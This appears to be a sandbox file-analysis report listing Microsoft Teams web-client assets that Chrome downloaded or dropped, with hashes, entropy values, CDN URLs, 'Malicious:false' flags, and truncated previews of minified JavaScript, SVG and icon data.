                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[918681],{48374:(r,o,e)=>{e.d(o,{vqc:()=>a,xyI:()=>l,$xS:()=>t,ozo:()=>c,yd$:()=>n,nkM:()=>d,Qpb:()=>u,DoI:()=>g,oam:()=>v,ww0:()=>B,e5x:()=>i,j0c:()=>s,Er0:()=>k,epd:()=>f,uf9:()=>P});const a="Shift",l="Enter",t=" ",c="Tab",n="ArrowDown",d="ArrowLeft",u="ArrowRight",g="ArrowUp",v="End",B="Home",i="PageDown",s="PageUp",k="Backspace",f="Delete",P="Escape"},188206:(r,o,e)=>{e.d(o,{F:()=>t});var a=e(48374),l=e(602835);e(513432);function t(r,o){const{disabled:e,disabledFocusable:t=!1,"aria-disabled":c,onClick:n,onKeyDown:d,onKeyUp:u,...g}=null!=o?o:{},v="string"==typeof c?"true"===c:c,B=e||t||v,i=(0,l.D)((r=>{B?(r.preventDefault(),r.stopPropagation()):null==n||n(r)})),s=(0,l.D)((r=>{if(null==d||d(r),r.isDefaultPrevented())return;const o=r.key;if(B&&(o===a.xyI||o===a.$xS))return r.preventDefault(),void r.stopPropagation();o!==a.$xS?o===a.xyI&&(r.preventDefault(),r.currentTarget.cli
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):89204
                                                                                                                                                                                                                                                                            Entropy (8bit):5.238643135138433
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:gXrMjuTJeXV5/90Nhb149+K2LosaygogyNxzreZ1Wn8BQI0SswV8s+1ibC5YGhFH:vPIFqfhTImoe8
                                                                                                                                                                                                                                                                            MD5:C7C790EF3E88381F1826824457B17896
                                                                                                                                                                                                                                                                            SHA1:11563ADD5A4853D202CF9E434C8822CFA63A3099
                                                                                                                                                                                                                                                                            SHA-256:72A519327E14A14AE1811DD5682CBFE514B1FBB8203F612ED16B1E746A3F658B
                                                                                                                                                                                                                                                                            SHA-512:F85121808648A63E061C760225391133C2849D08DB9B97E07BC8169D325C0235CF72B5B631AF389F61286A7B4DAF5296F31554DF858A063ED7677495954CDFC4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/990536-bbff6dab6502e105.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[990536],{474977:(t,e,a)=>{a.d(e,{R:()=>m});var o=a(519485),i=a(364819),d=a(440320);class s{constructor(t){this.modifier="alt",this.keyMaps=[],this.originalKeyMaps=[],this.commandIdToAreaDescription=new Map,this.isVirtualStrategy=!1,this.keyMaps=[],this.addCommandIdToAreaDescription("ShowShortcuts",["Global"],"shortcut_show_shortcuts","General",!0),this.addCommandIdToAreaDescription("GoToPowerBar",["Global"],"shortcut_open_search","General",!0),this.addCommandIdToAreaDescription("NewChat",["Global"],"shortcut_compose_new","General",!0),this.addCommandIdToAreaDescription("PopoutNewChat",["Global"],"shortcut_pop_out_new_chat","General",t.enableShortcutToOpenNewChatInPopout),this.addCommandIdToAreaDescription("PopoutSelectedChat",["Global"],"shortcut_popout_selected_chat","General"),this.addCommandIdToAreaDescription("OpenLeftRailFilter",["Global"],"shortcut_open_left_rail_filter
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1864
                                                                                                                                                                                                                                                                            Entropy (8bit):5.222032823730197
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                                                                                                                                                            MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                                                                                                                                                            SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                                                                                                                                                            SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                                                                                                                                                            SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (22180)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):22288
                                                                                                                                                                                                                                                                            Entropy (8bit):5.62299136289309
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:lldR4bo4wUeb33NabSTD+1Ogqmz5n1la2AYI2hziFGmuUlb6LWsxlkeOmLDN7Jtx:l7R4bo/Ueb39aAD+1OMXa2AYTujumb6x
                                                                                                                                                                                                                                                                            MD5:DE07E2D388DA62487BD66941067A0119
                                                                                                                                                                                                                                                                            SHA1:8CC71F3C6BB9124D510060AE68A657B4297BE87B
                                                                                                                                                                                                                                                                            SHA-256:D449067518D2AA0A4220CE768C81A7C833DEF331A297A5888122F4E87833D003
                                                                                                                                                                                                                                                                            SHA-512:D2617F7C3EDFAE79BE1B92ABF86FFC03984903926A1D7DC9C5BBA1CAA4971EFAB540F553C26B85E2FD6F5BE23F709FED98FF70AA39B1B18F57CCCE9996E00490
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[569549],{792529:(e,a,t)=>{t.d(a,{e:()=>y});var i=t(513432),f=t(644525),r=t(854130);var n=t(411947),s=t(164093),l=t(250452),o=t(264278);const u=/[\(\[\{][^\)\]\}]*[\)\]\}]/g,d=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,c=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,p=/\s+/g,b=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-\uA97F\uAC00-\uD7AF\uD7B0-\uD7FF\u3040-\u309F\u30A0-\u30FF\u3400-\u4DBF\u4E00-\u9FFF\uF900-\uFAFF]|[\uD840-\uD869][\uDC00-\uDED6]/;function g(e,a,t){return e?(e=function(e){return(e=(e=(e=e.replace(u,"")).replace(d,"")).replace(p," ")).trim()}(e),b.test(e)||!(null==t?void 0:t.allowPhoneInitials)&&c.test(e)?"":function(e,a,t){let i="";const f=e.split(" ");return 0!==f.length&&(i+=f[0].charAt(0).toUpperCase()),t||(2===f.length?i+=f[1].charAt(0).toUpperCase():3===f.length&&(i+=f[2].charAt(0).toUpperCase())),a&&i.length>1?i.charAt(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):130577
                                                                                                                                                                                                                                                                            Entropy (8bit):6.118042173827681
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:ttzQGu25DbX+jkCmv9HDU97un6mU3s5HQRdbDXroSB1bdw4yiVzVOfuGlVUWjG6N:cmU3RdbfoSBfFh7GlVUIJroo
                                                                                                                                                                                                                                                                            MD5:DB575D5168A86495A7FC90FC31B11FB6
                                                                                                                                                                                                                                                                            SHA1:DDCC208E5A9E90135C617E453D03282DF2AC57DF
                                                                                                                                                                                                                                                                            SHA-256:BC604E505DE25195860B4D6F8EE92DF4F8B63C159C7689D36D77F17CAE2B3F2C
                                                                                                                                                                                                                                                                            SHA-512:904F66546CE44BB74487930BC281B5518FCB7CD889009CD00A110EDB3A5B6D70FE07A5EBF6A44D38E0C7C0DB72357431E66E9F9A6A05D1B392F4883A9753DC53
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/18785-695c74004d5eb524.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[18785],{869700:(e,t,a)=>{"use strict";a.d(t,{W:()=>u});var i=a(513432),n=a(510139),l=a(348532),o=a(802756),M=a(362328);const c={kind:"Document",get definitions(){const e=(0,M.G)("mutation removeAuthenticatedUser($reason:String!,$userContextId:String) {removeAuthenticatedUser(reason:$reason,userContextId:$userContextId)}");return delete this.definitions,this.definitions=e.definitions}};var r=a(211713);function u(e){const t=function({authenticationService:e,client:t,rebootService:a}){return(0,i.useCallback)((async i=>{if(!t&&!e)return;const M={id:(0,n.DA)(),source:"use-logout",scenarioName:o.Cu.AuthWebLogout},[u,s]=(0,r.we)({options:{correlation:M},scenarioName:M.scenarioName,source:M.source,subContext:"use-logout::useHandleLogout"});if(u.appendScenarioEventData({operationType:"auth error page"}),t)await t.mutate({mutation:c,variables:{reason:"auth error page",userContextId:i},context:{corr
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2467)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):2592
                                                                                                                                                                                                                                                                            Entropy (8bit):4.845876308583554
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3OlsgW0ueB6NsiI1/16xPxUBnBOr1P/tdwZf/TvopbpQDGODGjkWWpC9tje:OsT8YVDwZXad/+r
                                                                                                                                                                                                                                                                            MD5:016A2F33A3DE3F6B0C9DD22D2E891D1F
                                                                                                                                                                                                                                                                            SHA1:0DD5EAC7743D24C1657A84E0CAB23E4E3034E9E3
                                                                                                                                                                                                                                                                            SHA-256:6A2E762D7B9A735DB69AFD281D4B45D0910E7F1CDC5E3F1ECEE6D19170FE65C4
                                                                                                                                                                                                                                                                            SHA-512:478CA92EF47710B70B4C640793862F8041AE6E1592D073E678688DE03F70692BB27405C37A414769BA0B2DB18B39B1296E7C13AC1D286D44DFC2C11EC4F0E0B5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[951405],{568561:(e,r,t)=>{t.r(r),t.d(r,{default:()=>n});const n={namespace:"recurrence",locale:"en-us",translations:{and_separator_format:"{{value1}} and {{value2}}",comma_separator_format:"{{value1}}, {{value2}}",meeting_recurrence_pattern_daily_mf:"{interval, plural, =1{Occurs daily} =2{Occurs every other day} other{Occurs every # days}}",meeting_recurrence_pattern_first_weekInMonth:"First",meeting_recurrence_pattern_first_weekInMonth_lower_case:"first",meeting_recurrence_pattern_fourth_weekInMonth:"Fourth",meeting_recurrence_pattern_fourth_weekInMonth_lower_case:"fourth",meeting_recurrence_pattern_last_weekInMonth:"Last",meeting_recurrence_pattern_last_weekInMonth_lower_case:"last",meeting_recurrence_pattern_monthly_mf:"{interval, plural, =1{Occurs every month on day {day}} =2{Occurs every other month on day {day}} other{Occurs every # months on day {day}}}",meeting_recurr
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (6267)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):6375
                                                                                                                                                                                                                                                                            Entropy (8bit):4.832022987269524
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:FrN9ujaDgFoSstYXnF82MJxJlFk2jOFbgrHQw4+sX43Jg4bDWUz0R4IsTBTj:FrN9mo7tYr+nGpuTxj
                                                                                                                                                                                                                                                                            MD5:E3947426289E682F86072FAD145E30FE
                                                                                                                                                                                                                                                                            SHA1:883FA22D817AB2BF256D5780ACA60C519F221554
                                                                                                                                                                                                                                                                            SHA-256:E34614C2F439E569A2D4D5FDDBEC5341E66C3544D6918E37B058E5D9051A9BAB
                                                                                                                                                                                                                                                                            SHA-512:2FA3C2A382D022D3F85DED713E21AEB29908EC829E490D85BD8D8EA4785B715F1C12289200755FC0625B4121794D61D6CD026A17EA79C0F63754C054C6C8B1CA
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[505772],{598476:(e,C,t)=>{t.d(C,{A:()=>r});var a=t(513432),l=t(395225),n=t.n(l),s=t(485529),c=t(829289),r=(0,s.Ke)({svg:function(e){var C=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:C.svg},a.createElement("g",{className:n()(c.Q.outline,C.outlinePart)},a.createElement("path",{d:"M11.5 8.5C11.5 8.22386 11.2761 8 11 8H9V6C9 5.72386 8.77614 5.5 8.5 5.5C8.22386 5.5 8 5.72386 8 6V8H6C5.72386 8 5.5 8.22386 5.5 8.5C5.5 8.77614 5.72386 9 6 9H8V11C8 11.2761 8.22386 11.5 8.5 11.5C8.77614 11.5 9 11.2761 9 11V9H11C11.2761 9 11.5 8.77614 11.5 8.5Z"}),a.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M8.5 3C11.5376 3 14 5.46243 14 8.5C14 9.83879 13.5217 11.0659 12.7266 12.0196L16.8536 16.1464C17.0488 16.3417 17.0488 16.6583 16.8536 16.8536C16.68 17.0271 16.4106 17.0464 16.2157 16.9114L16.1464 16.8536L12.0196 12.7
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (61326)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):61434
                                                                                                                                                                                                                                                                            Entropy (8bit):5.350445065198728
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:lrD1qUVrrg/aqwUs4xiOqWSe5T/EgpRZhBJ/jnr/jIBp203u2:ztCaqwUs4xiOqWSe5T/EgpRZhBJ/jnru
                                                                                                                                                                                                                                                                            MD5:06F59A4DB11AAA6C70C720875D563F47
                                                                                                                                                                                                                                                                            SHA1:15C7F259EEF5238AE04DC6DDDF406503E40ED7B3
                                                                                                                                                                                                                                                                            SHA-256:831A78A264BA5D32EF787C549ED56983B0B676FBB8A1831F3EEF510C6F735D54
                                                                                                                                                                                                                                                                            SHA-512:FAC67D519D7CC24A8D0CAB0A9FAABCFCFF08689A1D06F2FD0ACABA7CE1F760AC6C20C616A98578B0941868DC535927EA8E978CA4D9EF34C486FB0BB76E066A55
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/554072-beb3a1b3c4ad5128.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[554072],{881603:(e,r,t)=>{t.d(r,{AH:()=>n,O0:()=>a});var o=t(880175);const n=e=>o.Ss.from(e,"base64").toString("utf8"),a=e=>o.Ss.from(e,"utf8").toString("base64")},880175:(e,r,t)=>{t.d(r,{Km:()=>n,Xg:()=>a,JR:()=>s,Ss:()=>c});var o=t(485202);function n(e,r){switch(r){case"base64":return o.fromByteArray(e);case"utf8":case"utf-8":case void 0:return(new TextDecoder).decode(e);default:throw new Error("invalid/unsupported encoding")}}const a=(e,r)=>c.from(e,r).buffer,s=(e,r)=>c.from(e).toString(r);function i(e){const r=e;return e instanceof ArrayBuffer||"object"==typeof r&&null!==r&&"number"==typeof r.byteLength&&"function"==typeof r.slice&&void 0===r.byteOffset&&void 0===r.buffer}class c extends Uint8Array{toString(e){return n(this,e)}static from(e,r,t){if("string"==typeof e)return c.fromString(e,r);if(null!==e&&"object"==typeof e&&i(e.buffer))return c.fromArrayBuffer(e.buffer,e.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 18 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):172066
                                                                                                                                                                                                                                                                            Entropy (8bit):4.32521391566617
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:Dg7Z3gHhMIW7F3TGUhxkZ1OgbC6kStqJ1L3mC3g9BQ0MRB3R9HwXOeOkccOOOOJW:07Z32hLWNTJhxiQACPStqzZw9ep3RV
                                                                                                                                                                                                                                                                            MD5:247D14144A313421D8D84AA0EA54D249
                                                                                                                                                                                                                                                                            SHA1:83BEFDD6EBA57FAA3D3074AA08A28A4E8D75076A
                                                                                                                                                                                                                                                                            SHA-256:2D5AA67B8ACE13A94FD09316787E3C9ABA2ADAC767B6E2AB769A2265A2AD20F0
                                                                                                                                                                                                                                                                            SHA-512:F2D79A2A75148EFAF90A4A92980E781B1F94A4A1034383FFE5749983085EF7EAFA29D4804094296B212795501B4B4A126BC47C24A91B60C24104BC4B24D99565
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:...... ..........&...........(.......@@......(...6...00..........^... ...........*..........h....2........ .$5...8..``.... .....:m..PP.... ..g......HH.... ..T...i..@@.... .(B..R...<<.... .H:..z...00.... ..%...:..((.... .h...j`.. .... ......z........ .....z......... ............... .h.......(... ...@....................................................................................................................................................................................................................................DDD|...||x...||||||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L........|.....|@.............L...||x..|||||||H..................|||.............................||x..........................................................................................................................................................................................................
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (40944)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):41052
                                                                                                                                                                                                                                                                            Entropy (8bit):5.390112837133958
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:1lJDqZGg7/o3vmcQTSowsYReZMV5JPJzWeyqOeqOMcxKCe9DlBSd1dgzzurxGNdd:dD7eJlSxjeZ09KzXeqZ9CIqG+/DLTkBz
                                                                                                                                                                                                                                                                            MD5:80D33287BF24A250F4F9E3AB775F6C07
                                                                                                                                                                                                                                                                            SHA1:5BF597E95CA4CBE34A0020395B17C4123228789F
                                                                                                                                                                                                                                                                            SHA-256:DA6DB9913E2C5FE00C69945E8168AAA0FE8DFDA412094AC20C6854E7F48021D6
                                                                                                                                                                                                                                                                            SHA-512:2EC3406C101380733CB9AA1B3B6912B10CD204264AC0121ECD7C459288686694C9727FD7BA084D60ADB64A1214E64707FE83241AAA8973B9514C3C4A1C495203
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[984459],{964324:(e,n,t)=>{t.d(n,{b:()=>a});const a=(0,t(824004).dn)("SideEffect")},916460:(e,n,t)=>{t.d(n,{l:()=>l});var a=t(586892),s=t(390168),i=t(260465);const r=`${s.AN}|(?:s|^)(([\\w\\-~]+\\.)+(?:com|net|org|info|coop|int|co.uk|org\\.uk|ac\\.uk|uk|de|us|co|edu|gov|biz|za|cc|ca|cn|fr|ch|au|in|jp|be|it|nl|mx|no|ru|br|se|es|at|dk|eu|il))`,o=/^(?:(?:ht|f)tp(?:s?):\/\/)?(?:[^@\/\n]+@)?([^:\/?\n,\s"]+)/i,l=(e,n,t,a,s,r,o,l,m)=>({hasAttachment:e&&d(o)&&a,hasCodeSnippet:n&&d(o)&&r.includes("CodeSnippetCard"),hasForbiddenLink:t&&d(o)&&!(0,i.qL)(m)&&c(s,l)}),d=e=>e.some((e=>a.af.isTFLSmsUnVerifiedMri(e)||a.af.isTFLOffNetworkPhoneUser(e)||a.af.isTFLOffNetworkEmailUser(e))),c=(e,n)=>{const t=new RegExp(r,"img"),a=e.trim().split(/\s+|[,]/).join("\n").match(t);return!!a&&(!n||a.some((e=>m(e,n))))},m=(e,n)=>{try{const t=g(e);return n.every((e=>e!==t))}catch{return!0}},g=e=>{const n=e.m
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (12062)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):12170
                                                                                                                                                                                                                                                                            Entropy (8bit):4.380307764986876
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:DHGR8OnPEQWNcYclUcjczclkcxcUjclSR7RQeAVqdGVfEG6NBG4n5Gd1tpX7c3bs:KRLP5WNcYclUcjczclkcxcUjcla1TAVB
                                                                                                                                                                                                                                                                            MD5:8F2536274F18C13DD264B43873DE09D7
                                                                                                                                                                                                                                                                            SHA1:C75A1D5C8CB380D9B159B8B6CAF293E4DDBF6984
                                                                                                                                                                                                                                                                            SHA-256:F65F3F02448663AD1231393CF1F247533C94552F293390EFE728570506F18260
                                                                                                                                                                                                                                                                            SHA-512:BEB447132570DAB5DEDA1E6669A70EB1BB2B9762ABA2DDA7E2BAD3C348EA77FEA94E5CBCC61702F85D7BD2964A0708BC7EEA95ECD6D269828AB551D3480D09E3
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[317907],{317907:(a,c,h)=>{h.d(c,{wfg:()=>Z,QO3:()=>l,bdx:()=>m,nWK:()=>e,PFC:()=>H,EbJ:()=>M,Gyp:()=>V,iUz:()=>r,aYP:()=>C,EVt:()=>U,YVP:()=>g,MU$:()=>i,KyY:()=>u,tBH:()=>A,yq:()=>d,aom:()=>t,spT:()=>n,FwE:()=>s,hin:()=>R,ptg:()=>F,Y4e:()=>f,Y8w:()=>L});var v=h(693935);const Z=(0,v.U)("FullScreenMaximize20Regular","20",["M3 5c0-1.1.9-2 2-2h2a.5.5 0 0 1 0 1H5a1 1 0 0 0-1 1v2a.5.5 0 0 1-1 0V5Zm9.5-1.5c0-.28.22-.5.5-.5h2a2 2 0 0 1 2 2v2a.5.5 0 0 1-1 0V5a1 1 0 0 0-1-1h-2a.5.5 0 0 1-.5-.5Zm-9 9c.28 0 .5.22.5.5v2a1 1 0 0 0 1 1h2a.5.5 0 0 1 0 1H5a2 2 0 0 1-2-2v-2c0-.28.22-.5.5-.5Zm13 0c.28 0 .5.22.5.5v2a2 2 0 0 1-2 2h-2a.5.5 0 0 1 0-1h2a1 1 0 0 0 1-1v-2c0-.28.22-.5.5-.5Z"]),l=(0,v.U)("FullScreenMinimize20Regular","20",["M14 5a1 1 0 0 0 1 1h2a.5.5 0 0 1 0 1h-2a2 2 0 0 1-2-2V3a.5.5 0 0 1 1 0v2ZM6 15a1 1 0 0 0-1-1H3a.5.5 0 0 1 0-1h2a2 2 0 0 1 2 2v2a.5.5 0 0 1-1 0v-2Zm8 0a1 1 0 0 1 1-1h
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1317)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1425
                                                                                                                                                                                                                                                                            Entropy (8bit):5.322530262992215
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38ngM5xx8FsJeybSOPqJRPmC0vkjaLd76hpa8AP3LipufqJNtPa5eEpa8Ay:wp3sp3H2xOs36ReC0cjaLt3quq/keJqn
                                                                                                                                                                                                                                                                            MD5:1B6A88F9DD5747B566119263B842D4F0
                                                                                                                                                                                                                                                                            SHA1:36FD7F0500944CFE6158015CD20049DA6220F9A9
                                                                                                                                                                                                                                                                            SHA-256:E778D24A4A48AC146531FD90136935295D5FC2030E7565A0F4ADE82827E38C13
                                                                                                                                                                                                                                                                            SHA-512:FB44C08F3DD03D9F0CEAB3B611079FA374AFEB235C4925A1C8750E768BEECAD43F421383148D1A59C3A963C46280B7DE95D73FF3E16F103755B3B5FA2B20C863
                                                                                                                                                                                                                                                                            Malicious:false
